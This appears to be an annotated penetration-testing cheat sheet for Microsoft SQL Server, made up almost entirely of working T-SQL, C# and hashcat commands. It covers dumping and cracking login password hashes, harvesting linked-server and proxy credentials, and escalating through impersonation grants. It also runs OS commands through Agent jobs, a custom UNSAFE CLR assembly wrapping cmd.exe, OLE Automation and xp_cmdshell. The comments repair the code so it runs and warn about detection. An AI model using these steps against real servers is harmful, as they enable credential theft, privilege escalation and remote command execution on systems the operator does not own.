MS SQL

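-- Dump SQL-authenticated login hashes in hashcat's --username format (name:hash).
-- Needs CONTROL SERVER (sysadmin); without it password_hash comes back NULL and the
-- '+' concatenation turns the whole row into NULL.
-- Windows/AD logins are not in sys.sql_logins - nothing to crack for them here.
-- CONVERT(..., 1) keeps the 0x prefix: 0x0200... = SQL 2012+ (hashcat -m 1731),
-- 0x0100... = SQL 2005-2008 (hashcat -m 132).
-- Original had "FROMmaster" (missing space) and would not parse.
SELECT name + ':' + CONVERT(VARCHAR(MAX), password_hash, 1) AS formatted_output
FROM master.sys.sql_logins;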

Linked Servers

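-- Enumerate linked servers (is_linked = 1 excludes the local instance, server_id 0).
-- data_source / provider_string may embed connection details, sometimes cleartext credentials
-- for non-SQL providers. Original line had "catalogFROM sys.serversWHERE" and would not parse.
SELECT name, data_source, provider, provider_string, catalog
FROM sys.servers
WHERE is_linked = 1;

-- Whose credentials each hop uses: uses_self_credential = 1 means the current login is
-- forwarded; otherwise remote_name is the fixed remote login (its password is stored by SQL Server).
-- local_principal_id = 0 is the catch-all mapping for all logins.
SELECT s.name AS LinkedServer, s.data_source, l.local_principal_id, l.uses_self_credential, l.remote_name
FROM sys.servers AS s
INNER JOIN sys.linked_logins AS l ON l.server_id = s.server_id
WHERE s.is_linked = 1;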

-- Execute via OPENQUERY: the inner string is sent to the linked server as-is and runs under the
-- login mapping from sys.linked_logins, not necessarily as you. Single quotes inside the string
-- must be doubled. To run procedures / non-SELECT statements on the remote use
-- EXEC ('...') AT [LinkedServerName], which needs the "RPC Out" option enabled on the link.
SELECT *  FROM OPENQUERY([LinkedServerName], 'SELECT * FROM DatabaseName.SchemaName.TableName');

-- Four-part name: the local optimizer may pull the whole remote table and filter locally,
-- and some providers reject it; OPENQUERY pushes the query to the remote side instead.
SELECT *  FROM [LinkedServerName].[DatabaseName].[SchemaName].[TableName];
-- Same hash dump as above, formatted name:hash for hashcat --username (needs CONTROL SERVER;
-- password_hash is NULL otherwise, which makes the whole concatenation NULL).
SELECT name + ':' + CONVERT(VARCHAR(MAX), password_hash, 1) AS formatted_output
FROM master.sys.sql_logins;
# Crack the name:hash dump. -m 1731 = MSSQL 2012+ (0x0200 hashes); use -m 132 for 0x0100
# (SQL 2005-2008) hashes. --username makes hashcat ignore the "name:" prefix, "pass" is the
# wordlist, -O selects optimized kernels (faster, but may cap the candidate password length).
hashcat -m 1731 password_hash.txt pass --username -O

Proxies

-- Stored credentials (server-scoped; credential_identity is the OS account a proxy will run as).
SELECT * FROM msdb.sys.credentials;
-- SQL Agent proxies that already exist on the instance.
SELECT * FROM msdb.dbo.sysproxies;

Proxies (credential mapping):

-- Map every Agent proxy to the credential (and therefore the OS account) it executes as.
SELECT
    proxies.name AS ProxyName,
    creds.name AS CredentialName
FROM msdb.dbo.sysproxies AS proxies
INNER JOIN sys.credentials AS creds
    ON creds.credential_id = proxies.credential_id;

Impersonation

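-- Database-level impersonation grants in the CURRENT database.
-- BUG in the original: sys.database_permissions.type holds a short code ('IM' for
-- IMPERSONATE), so WHERE p.type = 'IMPERSONATE' never matches; filter on permission_name.
-- major_id is the principal that may be impersonated (class 4 = DATABASE_PRINCIPAL);
-- the original query never showed it, which is the column you actually care about.
-- Original also had "pJOIN" (missing newline) and would not parse.
SELECT grantee.name AS Grantee,
       grantor.name AS Grantor,
       target.name AS CanImpersonate,
       p.class_desc,
       p.permission_name,
       p.state_desc           -- GRANT vs DENY
FROM sys.database_permissions AS p
INNER JOIN sys.database_principals AS grantee ON p.grantee_principal_id = grantee.principal_id
INNER JOIN sys.database_principals AS grantor ON p.grantor_principal_id = grantor.principal_id
LEFT JOIN  sys.database_principals AS target  ON p.class = 4 AND p.major_id = target.principal_id
WHERE p.permission_name LIKE 'IMPERSONATE%';

-- Server-level (login) impersonation, e.g. IMPERSONATE on sa, or IMPERSONATE ANY LOGIN.
-- This is the one that gives sysadmin; class 101 = SERVER_PRINCIPAL.
SELECT grantee.name AS Grantee,
       target.name AS CanImpersonateLogin,
       p.permission_name,
       p.state_desc
FROM sys.server_permissions AS p
INNER JOIN sys.server_principals AS grantee ON p.grantee_principal_id = grantee.principal_id
LEFT JOIN  sys.server_principals AS target  ON p.class = 101 AND p.major_id = target.principal_id
WHERE p.permission_name LIKE 'IMPERSONATE%';

-- Switch context. USER = database user (database scope only); use EXECUTE AS LOGIN = 'sa'
-- for a server login. REVERT returns to the original context.
EXECUTE AS USER = 'username';
SELECT CURRENT_USER AS ImpersonatedUser, SYSTEM_USER AS CurrentLogin;
-- REVERT;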

Code Execution:

Agents:

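-- Enumerate SQL Agent jobs. Not strictly sysadmin-only: msdb role membership decides what you
-- see - SQLAgentReaderRole/OperatorRole/sysadmin see every job, SQLAgentUserRole only its own.
-- Fully qualified so it works from any database (the original needed USE msdb and had
-- "GOSELECT" on one line, which does not parse).
-- LEFT JOIN keeps jobs whose owner login no longer exists (an INNER JOIN silently dropped them).
SELECT j.job_id AS JobID,
       j.name AS JobName,
       j.enabled AS IsEnabled,
       j.description AS JobDescription,
       j.date_created AS DateCreated,
       j.date_modified AS DateModified,
       s.name AS OwnerName,          -- NULL = orphaned owner
       c.name AS CategoryName,
       j.originating_server AS OriginatingServer
FROM msdb.dbo.sysjobs AS j
INNER JOIN msdb.dbo.syscategories AS c ON j.category_id = c.category_id
LEFT JOIN  sys.server_principals AS s ON j.owner_sid = s.sid
ORDER BY j.name;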

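-- Add a step to an EXISTING job (create one first with msdb.dbo.sp_add_job if needed).
-- Without @proxy_name the step runs as the SQL Agent service account, and only a sysadmin
-- can add CmdExec/PowerShell steps that way - non-sysadmins need a proxy (see below).
-- Original was truncated: "command" lacked the @ and the statement ended in a comma.
EXEC msdb.dbo.sp_add_jobstep
    @job_name = N'JobName',
    @step_name = N'Xnjsdf',
    @subsystem = N'PowerShell',      -- or N'CmdExec' for a cmd.exe command line
    @command = N'whoami > C:\Temp\whoami.txt';
-- Nothing runs until the job is started (or its schedule fires). Start at the new step so
-- any pre-existing steps are skipped:
EXEC msdb.dbo.sp_start_job @job_name = N'JobName', @step_name = N'Xnjsdf';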

Proxies:

-- Credentials stored on the instance; credential_identity is the OS account a proxy built
-- on the credential will run as (the secret itself is never exposed here).
SELECT name, create_date, credential_identity AS credential, modify_date
FROM msdb.sys.credentials;

-- Create an Agent proxy on top of an existing credential (sysadmin required). The proxy is
-- useless until it is granted a subsystem (sp_grant_proxy_to_subsystem) and, for non-sysadmin
-- job owners, a login (sp_grant_login_to_proxy). This is an audited change in msdb.
EXEC msdb.dbo.sp_add_proxy @proxy_name = 'proxyName', @credential_name = 'CredentialName', @enabled = 1;

-- Every proxy with its backing credential; enabled = 0 proxies cannot be used by job steps.
SELECT
    proxies.proxy_id,
    proxies.name AS ProxyName,
    creds.name AS CredentialName,
    proxies.enabled
FROM msdb.dbo.sysproxies AS proxies
INNER JOIN msdb.sys.credentials AS creds
    ON creds.credential_id = proxies.credential_id;

-- Clean up: remove the proxy. Expect an error while job steps still reference it - delete or
-- re-point those steps first. The credential created for it is not removed by this call.
EXEC msdb.dbo.sp_delete_proxy @proxy_name = 'ProxyName';

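-- Which subsystems (CmdExec, PowerShell, ...) a proxy is allowed to run.
-- Fully qualified so it works from any database (the original relied on USE msdb).
SELECT p.name AS ProxyName,
       s.subsystem_id,
       s.subsystem AS SubsystemName
FROM msdb.dbo.sysproxies AS p
INNER JOIN msdb.dbo.sysproxysubsystem AS ps ON ps.proxy_id = p.proxy_id
INNER JOIN msdb.dbo.syssubsystems AS s ON s.subsystem_id = ps.subsystem_id
WHERE p.name = N'ProxyName';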

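-- Allow the proxy to run steps of a subsystem (sysadmin required).
-- Use @subsystem_name rather than a numeric ID: the ID table in the original did not match
-- the documented values, and IDs should be confirmed per instance with
--   SELECT subsystem_id, subsystem FROM msdb.dbo.syssubsystems;
EXEC msdb.dbo.sp_grant_proxy_to_subsystem
    @proxy_name = N'ProxyName',
    @subsystem_name = N'PowerShell';   -- or N'CmdExec', N'ActiveScripting', N'SSIS'
-- IDs as documented for sp_grant_proxy_to_subsystem (verify with the query above):
--    2: ActiveScripting (VBScript, JScript)
--    3: CmdExec
--   11: SSIS (Dts on older versions)
--   12: PowerShell
-- T-SQL steps never use a proxy; they run as the job owner.
-- A non-sysadmin job owner must also be allowed to use the proxy:
-- EXEC msdb.dbo.sp_grant_login_to_proxy @proxy_name = N'ProxyName', @login_name = N'DOMAIN\user';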

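-- Add a step that runs under the proxy (i.e. as the credential's OS account, not the Agent
-- service account). The proxy must already be granted the subsystem used here.
-- Original had a curly quote after CmdExec and would not parse.
EXEC msdb.dbo.sp_add_jobstep
    @job_name = N'JobName',
    @step_name = N'StepName',
    @subsystem = N'CmdExec',          -- or N'PowerShell'
    @command = N'whoami > C:\Temp\whoami.txt',
    @proxy_name = N'ProxyName';       -- use the created proxy
-- Run it now rather than waiting for a schedule:
EXEC msdb.dbo.sp_start_job @job_name = N'JobName', @step_name = N'StepName';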

Common Language Runtime:

-- Expose the advanced options (this changes config, it is not just a check); needs ALTER SETTINGS / sysadmin.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
-- Enable CLR. On SQL 2017+ 'clr strict security' is ON by default: every assembly is treated as
-- UNSAFE and must be signed, listed via sp_add_trusted_assembly, or loaded into a TRUSTWORTHY
-- database whose owner has UNSAFE ASSEMBLY permission. Both settings are logged in the error log.
EXEC sp_configure 'clr enabled', 1; RECONFIGURE;

Create DLL in visual studio:

using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using Microsoft.SqlServer.Server;
using System.Diagnostics;
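public class StoredProcedures
{
    /// <summary>
    /// CLR stored procedure: runs <paramref name="command"/> via "cmd.exe /c" under the SQL Server
    /// service account and sends the combined stdout/stderr text back to the caller through
    /// SqlContext.Pipe. System.Diagnostics.Process carries host-protection attributes that
    /// SQL Server disallows for SAFE and EXTERNAL_ACCESS, so the assembly must be loaded
    /// WITH PERMISSION_SET = UNSAFE.
    /// </summary>
    /// <param name="command">Command line passed verbatim to cmd.exe /c (attacker-controlled by design).</param>
    [Microsoft.SqlServer.Server.SqlProcedure]
    public static void RunCmd(string command)
    {
        // 'using' guarantees the handle is released even if the pipe send throws
        // (the original leaked it on exceptions).
        using (Process proc = new Process())
        {
            proc.StartInfo.FileName = "cmd.exe";
            // "2>&1" folds stderr into stdout so failures are visible instead of coming back empty;
            // reading a single stream avoids the classic two-pipe deadlock.
            proc.StartInfo.Arguments = "/c " + command + " 2>&1";
            proc.StartInfo.UseShellExecute = false;   // required for redirection
            proc.StartInfo.CreateNoWindow = true;
            proc.StartInfo.RedirectStandardOutput = true;
            proc.Start();

            // Read to EOF before WaitForExit, otherwise a child that fills the pipe blocks forever.
            string output = proc.StandardOutput.ReadToEnd();
            proc.WaitForExit();

            SqlContext.Pipe.Send(output);
        }
    }
}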

Upload and execute code:

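-- Load the assembly. The path is opened by the SQL Server service account ON THE SERVER, not
-- from your client. If you cannot drop a file there, pass the DLL bytes inline instead:
--   CREATE ASSEMBLY RunCmdAssembly FROM 0x4D5A9000...  (hex of the DLL)
-- Process.Start is blocked by host protection below UNSAFE, so EXTERNAL_ACCESS (the original
-- value) fails at runtime; UNSAFE requires one of: database TRUSTWORTHY ON with an owner holding
-- UNSAFE ASSEMBLY (e.g. sa), a signed assembly with a matching asymmetric-key login, or
-- (2017+, clr strict security) sp_add_trusted_assembly with the DLL's SHA-512.
CREATE ASSEMBLY RunCmdAssembly
FROM 'C:\Path\To\Your\Assembly\RunCmdAssembly.dll'
WITH PERMISSION_SET = UNSAFE;
GO
-- Bind a T-SQL procedure to the CLR method as [assembly].[class].[method]
-- (the class above is declared without a namespace, so no namespace prefix here).
CREATE PROCEDURE RunCmd
    @command NVARCHAR(4000)
AS EXTERNAL NAME RunCmdAssembly.StoredProcedures.RunCmd;
GO

-- Original used a curly opening quote and did not parse; replace CMD with the command to run.
EXEC RunCmd 'CMD';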

Object Linking and Embedding (OLE):

-- Expose advanced options (a config change, not a read-only check); needs ALTER SETTINGS / sysadmin.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
-- Enable the sp_OA* procedures. Only sysadmin may call them, the change is written to the
-- error log, and the COM objects run as the SQL Server service account.
EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;

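-- Run a command through WScript.Shell via OLE Automation (sysadmin). The original had
-- "sp_OA Create" (a space in the procedure name) and curly quotes, so it did not run.
-- Output is NOT returned to the session: WScript.Shell.Exec hands back a WshScriptExec object
-- that T-SQL cannot read. Redirect to a file and read it back (e.g. with
-- Scripting.FileSystemObject through sp_OA*, or OPENROWSET BULK) if you need the result.
DECLARE @ole INT, @hr INT;
DECLARE @cmd NVARCHAR(4000);
EXEC @hr = sp_OACreate 'WScript.Shell', @ole OUT;
IF @hr <> 0
BEGIN
    PRINT 'Error Creating OLE Object';
    EXEC sp_OAGetErrorInfo @ole;   -- surfaces the COM error text instead of a bare HRESULT
END;
SET @cmd = 'cmd /c dir > C:\Temp\dir.txt';
-- 'Exec' returns immediately; use the 'Run' method with waitOnReturn if the script must block.
EXEC @hr = sp_OAMethod @ole, 'Exec', NULL, @cmd;
IF @hr <> 0
BEGIN
    PRINT 'Error Executing Command';
    EXEC sp_OAGetErrorInfo @ole;
END;
EXEC @hr = sp_OADestroy @ole;
IF @hr <> 0
    PRINT 'Error Destroying OLE Object';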

XP_cmdshell:

-- Enabling xp_cmdshell needs ALTER SETTINGS (sysadmin) and is written to the error log; it is
-- one of the most commonly alerted-on changes on a SQL Server, so expect detection.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
-- Runs as the SQL Server service account for sysadmins; non-sysadmins (granted EXECUTE) run
-- under the "xp_cmdshell proxy account" set via sp_xp_cmdshell_proxy_account, if one exists.
EXEC xp_cmdshell 'dir';
